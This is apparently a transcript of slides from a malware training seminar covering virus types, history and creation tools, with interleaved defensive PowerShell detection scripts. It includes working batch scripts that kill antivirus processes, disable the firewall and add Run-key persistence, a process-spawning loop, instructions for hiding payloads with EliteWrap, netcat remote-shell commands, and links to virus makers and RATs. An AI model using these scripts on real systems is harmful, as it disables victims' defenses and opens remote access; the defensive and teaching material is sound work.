Malware Seminar WITH CHUCK EASTTOM

Transcript of Malware Seminar WITH CHUCK EASTTOM.

Page 1: Malware Seminar WITH CHUCK EASTTOM. About the Speaker  19 Books  32 industry certifications  2 Masters degrees  6 Computer science related patents.

Malware Seminar WITH CHUCK EASTTOM

Page 2: About the Speaker

19 Books

32 industry certifications

2 Masters degrees

6 Computer science related patents

Over 20 years experience, over 15 years teaching/training

Helped create CompTIA Security+, Linux+, Server+. Helped revise CEH v8

Frequent consultant/expert witness

www.chuckeasttom.com

[email protected]

Get the software for this class at

http://www.chuckeasttom.com/MalwareClassKit.zip

Page 3: IMPORTANT

In this lesson you will learn to execute certain attacks. It is important that you understand that doing so on any computer other than a test system or a system you have permission to attack is a serious crime.

This is for you to learn techniques for penetration testing, and to understand the techniques criminals use.

I repeat: MISUSING WHAT IS IN THIS LESSON IS A SERIOUS CRIME.

Page 4: Why learn it then?

There are several reasons: Understanding malware helps to combat it.

It is possible to use innocuous ‘malware’ as part of a penetration test. This must only be done with great care and when the malware in question is:

Completely innocuous

Not particularly viral (i.e. does not spread easily)

Malware is a primary weapon in cyber warfare and students in this class may be employed by government agencies.

Page 5: Malware

Virus

Worms

Spyware

Logic Bomb

Rootkit

Annoyances

Browser Hijacker

Scareware

Adware

Pornware

Page 6: The mechanics of a virus

• Delivery

a. Via email

b. Copying over a network

c. Direct communication with exposed ports.

• Payload

• Types

• Multipartite

• Boot sector

• Stealth

• Armored

• Encryption

• Polymorphic/Metamorphic

Page 7: Virus Types

Armored Virus

An armored virus uses techniques that make it hard to analyze. Code confusion (obfuscation) is one such method: the code is written so that if the virus is disassembled, it won’t be easy to follow. Compressed code is another method for armoring the virus.

Page 8: Virus Types Continued

Sparse Infection Virus

A sparse infection virus is only active intermittently and for short periods, which makes it much harder to detect. The virus is dormant much of the time and carries out whatever malicious actions it has only sporadically. If it is well written, it infects at random intervals rather than regular ones. The intermittent nature of the attack is what makes these viruses so difficult for anti-virus software to detect; for example, the virus may not be active when a virus scan is run.

In some cases the sparse infector targets a specific program but only executes every 10th or 20th time that target program runs. Or a sparse infector may have a burst of activity, then lie dormant for a period of time. There are a number of variations on the theme, but the basic principle is the same: reduce the frequency of attack and thus reduce the chances of detection.

Page 9: Virus Types Continued

A macro virus is written into a macro in some business application. For example, Microsoft Office allows users to write macros to automate some tasks. Microsoft Outlook is designed so that a programmer can write scripts using a subset of the Visual Basic programming language, called Visual Basic for Applications (VBA). This scripting language is, in fact, built into all Microsoft Office products. Programmers can also use the closely related VBScript language. Both languages are quite easy to learn. If such a script is attached to an e-mail and the recipient is using Outlook, then the script can execute. That execution can do any number of things, including scanning the address book, looking for addresses, sending out e-mail, deleting e-mail, and more.

Page 10: Encrypted virus

Either to armor or as ransomware

To use encryption the malware needs at least three components:

The actual malware code (which is encrypted).

A module to perform encryption/decryption.

A key.

One of the most widely known examples is the infamous CryptoLocker. It was first discovered in 2013. CryptoLocker utilized asymmetric encryption to lock the user’s files. Several varieties of CryptoLocker have been detected.

Page 11: Virus Types Continued

A multipartite virus attacks your system in multiple ways, but usually infects the boot sector as well as some other portion of the system. File infection viruses are made to infect some file on the computer, and they spread when the user runs the infected file. Boot sector viruses run when the computer boots up. A multipartite virus does both. For example, a multipartite virus might affect the boot sector and make changes to a specific file or the Windows registry.

Page 12: Virus Types Continued

More sophisticated IDSs look for common shellcode signatures. But even these systems can be bypassed by using polymorphic shellcode. One simple technique virus writers use is to encrypt the shellcode by XORing values over it, use loader code to decrypt the shellcode at run time, and then execute the decrypted shellcode.
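From the detection side, the weakness of this trick is that a single-byte XOR wrapper has only 256 possible keys, so a scanner does not need a signature for every encoded variant; it can try every key and look for the signature in each decoding. The following is an added example and not code from the seminar; the signature and the sample buffer are constructed, meaningless bytes (not real shellcode), and Find-XorEncodedSignature is a name chosen here.

```powershell
# Added example, not from the seminar. Brute-forces every single-byte XOR key
# and reports where a known signature appears in the decoded buffer.
function Find-XorEncodedSignature {
    param(
        [Parameter(Mandatory)] [byte[]] $Buffer,
        [Parameter(Mandatory)] [byte[]] $Signature
    )
    $hits = @()
    # 256 keys is a tiny search space: decode under each one and scan for the signature.
    foreach ($key in 0..255) {
        $decoded = [byte[]] ($Buffer | ForEach-Object { $_ -bxor $key })
        $last = $decoded.Length - $Signature.Length
        for ($i = 0; $i -le $last; $i++) {
            $match = $true
            for ($j = 0; $j -lt $Signature.Length; $j++) {
                if ($decoded[$i + $j] -ne $Signature[$j]) { $match = $false; break }
            }
            if ($match) {
                $hits += [pscustomobject] @{ Key = $key; Offset = $i }
                break   # one hit per key is enough to flag the buffer
            }
        }
    }
    return ,$hits
}

# Constructed sample: a made-up 8-byte "signature" (not real shellcode),
# XOR-encoded with key 0x5A and wrapped in filler bytes, the way a loader
# stub would carry it. The plain signature never appears in $sample.
$signature = [byte[]] (0xDE, 0xAD, 0xBE, 0xEF, 0xCA, 0xFE, 0xF0, 0x0D)
$encoded   = [byte[]] ($signature | ForEach-Object { $_ -bxor 0x5A })
$filler    = [byte[]] (0x90, 0x90, 0x90, 0x90)
$sample    = [byte[]] ($filler + $encoded + $filler)

Find-XorEncodedSignature -Buffer $sample -Signature $signature | Format-Table Key, Offset
```

The brute force only sees through a fixed single-byte key. Multi-byte or rolling keys enlarge the key space, which is why scanners pair this kind of static check with emulation of the decoder loop and with entropy measurements on the encoded region.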

Page 13: Ransomware

One of the most widely known examples is the infamous CryptoLocker. It was first discovered in 2013. CryptoLocker utilized asymmetric encryption to lock the user’s files. Several varieties of CryptoLocker have been detected.

CryptoWall is a variant of CryptoLocker first found in August of 2014. It looked and behaved much like CryptoLocker. In addition to encrypting sensitive files it would communicate with a command and control server, and even take a screenshot of the infected machine. By March of 2015 a variation of CryptoWall had been discovered which is bundled with the spyware TSPY_FAREIT.YOI and actually steals credentials from the infected system, in addition to holding files for ransom.

Page 14: History of Viruses

The next few slides give you a history of viruses. This is not on the test, but it helps to give you context: understanding how viruses have developed will allow you to better understand how they function.


Page 15: History of Viruses

1981 Apple Viruses 1, 2, and 3 are some of the first viruses "in the wild" or public domain. Found on the Apple II operating system, the viruses spread through Texas A&M via pirated computer games.

1980s In the early 1980s, Fred Cohen did extensive theoretical research, as well as setting up and performing numerous practical experiments, regarding viral type programs. His dissertation was presented in 1986 as part of the requirements for a doctorate in electrical engineering from the University of Southern California. This work is foundational, and any serious student of viral programs disregards it at his own risk. Dr. Cohen's definition of a computer virus is "a program that can 'infect' other programs by modifying them to include a ... version of itself".

1987 In November, the Lehigh virus was discovered at Lehigh University in the U.S. It was the first "memory resident file infector". A file-infecting virus attacks executable files. It gets control when the file is opened. The Lehigh virus attacked a file called COMMAND.COM. When the file was run (usually by booting from an infected disk), the virus stayed in the resident memory.


Page 16: History of Viruses Continued

1988 In March, the first anti-virus software was written. It was designed to detect and remove the Brain virus and immunized disks against Brain infection.

1990 Viruses combining various characteristics spring up. They included polymorphism (encrypted viruses where the decryption routine code is variable), armoring (used to prevent anti-virus researchers from disassembling a virus) and multipartite infection (can infect both programs and boot sectors).

1991 Symantec releases Norton Anti-Virus software.


Page 17: History of Viruses Continued

1992 Media mayhem greeted the Michelangelo virus in March. Predictions of massive disruptions were made and anti-virus software sales soared. As it turned out, cases of the virus were few and far between.

1994 A virus called Kaos4 was posted on a pornography news group file. It was encoded as text and downloaded by a number of users.

1996 Concept, a macro-virus, becomes the most common virus in the world.


Page 18: History of Viruses Continued

1999 The Melissa virus, a macro, appears. It uses Microsoft Word to infect computers and is passed on to others through Microsoft Outlook and Outlook Express e-mail programs.

2000 The "I Love You Virus" wreaks havoc around the world. It is transmitted by e-mail and, when opened, is automatically sent to everyone in the user's address book.

July 2001: The Code Red worm infects tens of thousands of systems running Microsoft Windows NT and Windows 2000 server software, causing an estimated $2 billion in damages. The worm is programmed to use the power of all infected machines against the White House Web site at a predetermined date. In an ad hoc partnership with virus hunters and technology companies, the White House deciphers the virus's code and blocks traffic as the worm begins its attack.


Page 19: History of Viruses Continued

2002: Melissa virus author David L. Smith, 33, is sentenced to 20 months in federal prison.

Jan. 2003: The "Slammer" worm infects hundreds of thousands of computers in less than three hours. The fastest-spreading worm ever wreaks havoc on businesses worldwide, knocking cash machines offline and delaying airline flights.

2004: The "MyDoom" worm becomes the fastest-spreading e-mail worm as it causes headaches -- but very little damage -- almost a year to the day after Slammer ran rampant in late January 2003. MyDoom uses "social engineering," or low-tech psychological tricks, to persuade people to open the e-mail attachment that contains the virus. It claims to be a notification that an e-mail message sent earlier has failed, and prompts the user to open the attachment to see what the message text originally said. Many people fall for it.


Page 20: Mac Defender

This virus is very interesting for multiple reasons. First because it specifically targets Macintosh computers. Most experts have long agreed that Apple products remained relatively virus free simply because their products did not have enough market share to attract the attention of virus writers. It has long been suspected that if Apple garnered a greater market share, they would also begin to get more virus attacks. That has proven to be true.

This virus was first seen in the early months of 2011. It is embedded in some web pages and when a user visits those web pages, he or she is given a fake virus scan that tells the user that they have a virus and it needs to be fixed. The “fix” is actually downloading a virus. The point of the virus is to get end users to purchase the MacDefender “antivirus” product. This is the second reason this case is noteworthy. Fake antivirus attacks, also known as scareware, have been becoming increasingly common.


Page 21: FakeAV

This virus first appeared in July 2012. It affected Windows systems ranging from Windows 95 to Windows 7 and Windows Server 2003. This was a fake anti-virus (thus the name FakeAV). It would pop up fake virus warnings. This was not the first such fake anti-virus malware, but it was one of the more recent ones.

Symantec FakeAV http://www.symantec.com/security_response/writeup.jsp?docid=2012-073004-1749-99&tabid=2


Page 22: Levels of virus creation skill

From least skilled to most skilled:

1. Use a GUI tool

2. Use a batch file virus or simple macro virus

3. Alter existing virus code

4. Write your own from scratch

5. Write your own from scratch that is stealthy and self-destructs.

Page 23: Making a Virus

Terabit Virus Maker http://www.mediafire.com/?dwdqtmmtzh2

JPS Virus Maker http://vx.netlux.org/vx.php?id=tj04

Internet Worm Maker Thing http://vx.netlux.org/vx.php?id=ti06

Source code for various viruses http://vxheaven.org/src.php

Online virus writing resource http://www.sourcecodesworld.com/source/BrowseCategory.asp?CatId=52

I love you virus source code http://www.cexx.org/loveletter.htm

Melissa Source code http://www.cs.miami.edu/~burt/learning/Csc521.061/notes/melissa.txt

Page 24: Tools

There are a variety of virus/Trojan/worm creation tools.

One very good website is vxheaven.org

You will also see some on the following slides.

Page 25: Terabit Virus Maker

Page 26: Simple VBS virus

Great for penetration testing:

Dim msg, sapi
msg="You have violated security policies"
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

Page 27: Disable the internet (must be a bat file)

echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo You Have Been HACKED!
PAUSE

Page 28: Endless loop script

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

You can use notepad, calc, anything you like. But it keeps launching copies until the system is locked up.

Page 29: Batch file virus

Turns off target security

@echo off
rem --
rem Permanently Kill Anti-Virus
net stop "Security Center"
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
tskill /A mcafe*
tskill /A panda*
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
del /Q /F C:\Program Files\kaspersky\*.*

This uses basic command line tools:

• Tskill kills tasks

• Del deletes files and directories

• The del flags are

• /F Ignore read-only setting and delete anyway (FORCE)

• /Q Quiet mode, do not give a Yes/No Prompt before deleting

• /S Delete from all Subfolders (DELTREE)
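What a defender checks after a script like this is whether the things it targets are still in place: the Security Center service (service name wscsvc), the firewall profiles, and the Service Control Manager events that record every service stop. The function below is an added example, not seminar code. Test-EndpointDefenseBaseline is a name chosen here, Get-NetFirewallProfile needs Windows 8 / Server 2012 or later, and the event-message match assumes an English-language system.

```powershell
# Added example, not from the seminar. Reports the state the batch file above
# tries to change: the Security Center service, the firewall profiles, and
# recent Service Control Manager events that record a Security Center stop.
function Test-EndpointDefenseBaseline {
    param([int] $EventsToScan = 200)   # how many recent SCM events to inspect

    $wsc = Get-Service -Name wscsvc -ErrorAction SilentlyContinue
    $securityCenterRunning = ($null -ne $wsc) -and ($wsc.Status -eq 'Running')

    # Profiles whose Enabled flag is False, which is what
    # "netsh firewall set opmode mode=disable" aims for
    $disabledProfiles = @(
        Get-NetFirewallProfile -ErrorAction SilentlyContinue |
            Where-Object { "$($_.Enabled)" -eq 'False' } |
            Select-Object -ExpandProperty Name
    )

    # Event 7036 from Service Control Manager logs every service state change;
    # a "net stop" of Security Center leaves one saying it entered the stopped state.
    $filter = @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7036 }
    $scmEvents = Get-WinEvent -FilterHashtable $filter -MaxEvents $EventsToScan -ErrorAction SilentlyContinue
    $securityCenterStops = @(
        $scmEvents |
            Where-Object { $_.Message -like '*Security Center*' -and $_.Message -like '*stopped*' } |
            Select-Object TimeCreated, Message
    )

    [pscustomobject] @{
        SecurityCenterRunning     = $securityCenterRunning
        DisabledFirewallProfiles  = $disabledProfiles
        RecentSecurityCenterStops = $securityCenterStops
    }
}

Test-EndpointDefenseBaseline | Format-List
```

Reading the event log is the part that survives a cleanup: the service can be restarted and the firewall re-enabled, but the 7036 event of the stop stays in the System log unless the log itself is cleared.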

Page 30: Using the powershell

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Keeps pressing the Enter key every 100 milliseconds. You can replace it with any other key.

Page 31: Virus Writing Techniques

WMIC

Spyware with GINA.dll

Page 32: wmic

WMIC is the Windows Management Instrumentation Command-line. It can be scripted.

https://msdn.microsoft.com/en-us/library/aa394531(v=vs.85).aspx

https://msdn.microsoft.com/en-us/library/bb742610.aspx

Page 33: wmic

wmic diskdrive list

Page 34: wmic

wmic useraccount list

Page 35: Spyware creation techniques

Microsoft Graphical Identification and Authentication Dynamic Link Library (MSGINA DLL). It is loaded by the Winlogon executable during login. It allows third party customizations of the login by loading their own DLL between WinLogon and GINA.dll.

https://msdn.microsoft.com/en-us/library/bb742447.aspx

https://msdn.microsoft.com/en-us/library/windows/desktop/aa380543(v=vs.85).aspx

https://msdn.microsoft.com/en-us/library/windows/desktop/aa374744(v=vs.85).aspx

Here is where you find such a DLL, if it exists:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GinaDLL

This would be advanced spyware and not common.
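The GinaDLL value and the Run keys used on the "Disable the internet" slide are both autostart locations, and both can be audited with the same script. The function below is an added example, not seminar code: it reads the GinaDLL value and the HKLM/HKCU Run keys and flags entries that point at script files (.bat, .cmd, .vbs, .js) or outside the usual program directories. Get-AutostartAudit is a name chosen here, and the trusted-directory list is a hypothetical allow-list that a real deployment would tune. The Winlogon key exists on every Windows version, but GinaDLL itself only applies up to Windows XP / Server 2003, so no GinaDLL line on a newer system is the normal result.

```powershell
# Added example, not from the seminar. Lists the GinaDLL value and the
# HKLM/HKCU Run keys, flagging entries that point outside the expected
# program directories or at script files such as .bat or .vbs.
function Get-AutostartAudit {
    $checks = @(
        @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'; Names = @('GinaDLL') },
        @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';           Names = $null },
        @{ Path = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';           Names = $null }
    )
    # Properties the registry provider adds that are not registry values
    $psProps = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')
    # Hypothetical allow-list: directories where autostart binaries are expected to live
    $trustedRoots = @($env:ProgramFiles, ${env:ProgramFiles(x86)}, $env:SystemRoot) | Where-Object { $_ }

    foreach ($check in $checks) {
        if (-not (Test-Path -Path $check.Path)) { continue }
        $props = Get-ItemProperty -Path $check.Path
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -in $psProps) { continue }
            # For Winlogon only GinaDLL is of interest here; Run keys are taken whole
            if ($check.Names -and ($p.Name -notin $check.Names)) { continue }
            $value = [string] $p.Value
            # Executable path: the quoted part if quoted, otherwise the first token
            if ($value -match '^"([^"]+)"') { $exe = $Matches[1] } else { $exe = ($value -split '\s+')[0] }
            $inTrusted = $false
            foreach ($root in $trustedRoots) {
                if ($exe -like "$root\*") { $inTrusted = $true }
            }
            $scriptLike = $exe -match '\.(bat|cmd|vbs|js)$'
            [pscustomobject] @{
                Key        = $check.Path
                Name       = $p.Name
                Value      = $value
                Suspicious = $scriptLike -or (-not $inTrusted)
            }
        }
    }
}

Get-AutostartAudit | Where-Object Suspicious | Format-List
```

The Run entries from the earlier slide (WINDOWsAPI and CONTROLexit, both pointing at c:\windows\wimn32.bat) would be reported even though they sit under the system directory, because the script-file check fires independently of the directory check.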

Page 36: Spyware continued

There can be legitimate third party modifications to gina.dll such as these:

Page 37: Determine the domain

C++ code that determines the domain

Page 38: Self-Destruct

C++ code that self destructs

Page 39: Trojan Horse Tools

EliteWrapper

ADS

Using Alternate Data Streams

Attach a file to a text file:

type notepad.exe > ADSFile.txt:notepad.exe

Attach a script to a file:

type somescript.vbs > ADSFile.txt:somescript.vbs

Brief tutorial http://synjunkie.blogspot.com/2007/11/using-and-abusing-alternate-data.html
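A file hidden in an alternate data stream does not show up in a directory listing, but the streams are enumerable, so a defender can sweep a directory tree for files carrying anything besides the default ::$DATA stream. The following is an added example, not seminar code: Find-AlternateDataStreams is a name chosen here, the demo file and its "payload.txt" stream are constructed in the temp directory (plain text standing in for the executable the slide attaches) and removed again, and the Zone.Identifier stream is excluded by default because browsers and mail clients add it to downloaded files routinely.

```powershell
# Added example, not from the seminar. Finds files under a directory that carry
# named alternate data streams besides the default ::$DATA stream, then builds
# a temporary demo file to show what a hit looks like.
function Find-AlternateDataStreams {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [switch] $IncludeZoneIdentifier   # Zone.Identifier is the benign "mark of the web"
    )
    Get-ChildItem -LiteralPath $Path -File -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object { Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue } |
        Where-Object {
            $_.Stream -ne ':$DATA' -and
            ($IncludeZoneIdentifier -or $_.Stream -ne 'Zone.Identifier')
        } |
        Select-Object FileName, Stream, Length
}

# Constructed demo (needs an NTFS volume): a text file whose visible content is
# one line, with a second stream named "payload.txt" attached to it.
$demoDir  = Join-Path $env:TEMP 'ads-demo'
New-Item -ItemType Directory -Path $demoDir -Force | Out-Null
$demoFile = Join-Path $demoDir 'ADSFile.txt'
Set-Content -LiteralPath $demoFile -Value 'visible text'
Set-Content -LiteralPath $demoFile -Stream 'payload.txt' -Value 'hidden text'

# Only the named stream is reported; the file's own ::$DATA stream is filtered out
Find-AlternateDataStreams -Path $demoDir | Format-Table -AutoSize

# To read a reported stream:   Get-Content -LiteralPath $demoFile -Stream 'payload.txt'
# To strip it, keeping the file: Remove-Item -LiteralPath $demoFile -Stream 'payload.txt'
Remove-Item -LiteralPath $demoDir -Recurse -Force
```

The size reported for a stream is its own length, which is how the slide's "type notepad.exe > ADSFile.txt:notepad.exe" case is spotted: the text file stays tiny in Explorer, while its stream is the full size of the executable.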

Page 40: Using EliteWrap

You will have to temporarily turn off your anti virus, then download elitewrap from https://packetstormsecurity.com/files/download/14593/elitewrap.zip

Enter the file you want to run that is visible

Enter operation

1 - Pack only

2 - Pack and execute, visible, asynchronously

3 - Pack and execute, hidden, asynchronously

4 - Pack and execute, visible, synchronously

5 - Pack and execute, hidden, synchronously

6 - Execute only, visible, asynchronously

7 - Execute only, hidden, asynchronously

8 - Execute only, visible, synchronously

9 - Execute only, hidden, synchronously

Enter command line

Enter second file (the item you are surreptitiously installing).

Enter operation

When done with files, press enter

Page 41: EliteWrap Example

Page 42: EliteWrap continued

Note the file size. When you pack them, text.exe is only slightly bigger than the other file.

Page 43: EliteWrap continued

More importantly when you run elitetest.exe you only see calculator running, you don’t see the second program. But it clearly is loaded and running. And stays loaded after the original cover program (calc.exe) is closed.

Page 44: Using netcat

Attach netcat to some other tool using any wrapper (like elitewrap)

Have it run nc -l -p 80

You have just opened a reverse shell on the infected machine.

Netcat cheat sheet from SANS

http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf

Page 45: Basic Video Tutorial

Page 46: Basic Netcat commands

Receiving files nc -l 1001 > received_file

Command shell nc -l -p 1001 -e cmd.exe

Connect to that shell nc --ssl 192.168.1.10 1001
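Whatever the wrapper hides it behind, a netcat listener still has to own a listening socket, and the owning process is visible to anyone who looks. The function below is an added example, not seminar code: it maps every listening TCP socket to its process so that an unexpected owner (nc.exe on port 80, or cmd.exe bound to a port via -e) stands out. Get-ListeningPortAudit is a name chosen here, the watch-list of process names is a hypothetical starting point, Get-NetTCPConnection needs Windows 8 / Server 2012 or later, and the session should be elevated to see the path of every process.

```powershell
# Added example, not from the seminar. Maps listening TCP sockets to their
# owning process and flags names that should not hold a listener.
function Get-ListeningPortAudit {
    param(
        # Hypothetical watch-list: process names that should not own a listening socket on a workstation
        [string[]] $WatchList = @('nc', 'ncat', 'netcat', 'cmd', 'powershell', 'wscript', 'cscript')
    )
    # Index running processes by PID once, rather than calling Get-Process per socket
    $byPid = @{}
    Get-Process | ForEach-Object { $byPid[$_.Id] = $_ }

    Get-NetTCPConnection -State Listen | ForEach-Object {
        $proc = $byPid[[int] $_.OwningProcess]
        $name = if ($proc) { $proc.ProcessName } else { '<unknown>' }
        $path = if ($proc) { $proc.Path } else { $null }   # $null when not elevated
        [pscustomobject] @{
            LocalAddress = $_.LocalAddress
            LocalPort    = $_.LocalPort
            ProcessId    = $_.OwningProcess
            Process      = $name
            Path         = $path
            Suspicious   = ($name -in $WatchList)
        }
    }
}

# Full picture first; the Suspicious column is what an analyst scans for
Get-ListeningPortAudit | Sort-Object LocalPort | Format-Table -AutoSize
```

A wrapper can rename the netcat binary, so the name match is only the first filter; the Path column is what lets you check the file's publisher signature with Get-AuthenticodeSignature, and a listener on a well-known port such as 80 whose owner is not the web server you expect is worth a look regardless of its name.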

Page 47: Other Trojan & Related Tools

RemoteByMail Take control of a target machine remotely via email http://www.runtime.org/remotebymail.htm

Dark Comet RAT: Take control of a machine remotely http://www.darkcomet-rat.com/

RAT is Remote Access Trojan

Page 48: Botnets

Groups of computers that are unaware they are being used as attackers. They are referred to as zombies.

There are tools for creating and managing botnets:

Poison Ivy http://www.poisonivy-rat.com/index.php?link=download

Illusions

Zeus

Page 49: Now more in depth

Screen capture spyware (code is in the class handout, in C#, complete working code)

Capture email data

Send emails